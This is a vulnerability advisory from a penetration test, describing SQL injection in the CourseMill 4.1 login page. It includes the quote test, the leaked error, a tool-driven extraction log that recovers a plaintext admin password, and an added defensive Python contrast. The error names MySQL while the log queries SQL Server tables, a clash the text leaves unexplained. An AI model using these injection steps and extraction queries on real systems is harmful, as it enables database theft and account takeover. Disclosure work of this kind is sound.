+==================================================================================================+
sasquatch of SecureState - [email protected]
The username field on the login page is susceptible to SQL injection…
http://www.website.com/coursemill/userlogin.jsp seems to be the default login page.
Impact: full data dump of the underlying database -> usernames/passwords -> ???
username: '
password: test
An unrecoverable error has occurred.
Please report this message to your system administrator.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
©2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved.
Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database.
This is a free tool available from http://axf.watchfire.com/extensions/exploiter.aspx
The logins are stored unencrypted (plaintext) in the "Admin" table. Column names are: ID, LastLogin, OrgId, Password.
This was found during a penetration test; whether further exploitation from inside the application is possible was not tested.
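The following is an added illustration, not code from CourseMill or the advisory: it reproduces the two root causes described above (a login query built by string concatenation, which a lone quote breaks exactly as the error page shows, and a password column holding plaintext) next to the parameterized query and salted-hash storage that close them. The Admin table, its rows and the query shape are assumed from the advisory; the real schema is not known.

```python
import hashlib
import hmac
import os
import sqlite3

def build_db():
    """Constructed in-memory stand-in for the application's Admin table.
    Column names follow the advisory; the real CourseMill schema is assumed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Admin (ID TEXT, LastLogin TEXT, OrgId TEXT, Password TEXT)")
    # Plaintext credential stored the way the advisory describes.
    db.execute("INSERT INTO Admin VALUES ('admin', 'Oct 7 2007 2:45AM', '', 'admin')")
    return db

def login_vulnerable(db, username, password):
    """SQL built by string concatenation: a lone quote in the username breaks
    the statement, which is exactly the symptom the advisory reports."""
    sql = ("SELECT ID FROM Admin WHERE ID='" + username
           + "' AND Password='" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    """Same lookup with bound parameters: the input is data, never SQL text."""
    row = db.execute("SELECT ID FROM Admin WHERE ID=? AND Password=?",
                     (username, password)).fetchone()
    return row is not None

def outcome(login, db, username, password):
    """Classify a login attempt; 'sql-error' on a lone quote is the
    fingerprint that the verbose error page leaked to the tester."""
    try:
        return "granted" if login(db, username, password) else "denied"
    except sqlite3.OperationalError:
        return "sql-error"

def hash_password(password, salt=None, rounds=200_000):
    """Salted PBKDF2-HMAC-SHA256 so a dumped Admin table does not yield
    reusable credentials, unlike the plaintext column in the advisory."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt.hex() + "$" + digest.hex()

def verify_password(stored, password):
    """Constant-time comparison against a hash_password() record."""
    salt_hex, _digest_hex = stored.split("$", 1)
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)
```

Run `outcome(login_vulnerable, build_db(), "'", "test")` to see the same class of failure the login page returned; the parameterized version simply denies the attempt and exposes no database error to the client.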
CourseMill Enterprise v.4.1 SP4 (4527) (http://www.trivantis.com/products/coursemill.html)
"Trivantis and CourseMill are registered trademarks of Trivantis"
Trivantis Corporation
311 Elm Street Suite 200
Cincinnati, OH 45202
877-929-0188
513-929-0188
http://www.trivantis.com
Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us.
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin')
Column found: table=Admin, column=ID
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID'
Column found: table=Admin, column=LastLogin
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin'
Column found: table=Admin, column=OrgId
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'OrgId'
Column found: table=Admin, column=Password
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'Password'
Extracting records for table=Admin…
Exploit method is now Convert
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT ID)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT LastLogin)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT OrgId)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT Password)) FROM Admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(ID,'')))) FROM Admin
Value found: table=Admin, column=ID, value=admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(LastLogin,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=LastLogin, value=Oct 7 2007 2:45AM
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(OrgId,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=OrgId, value=
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(Password,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=Password, value=admin
Etc…
and proceeds to dump the entire database…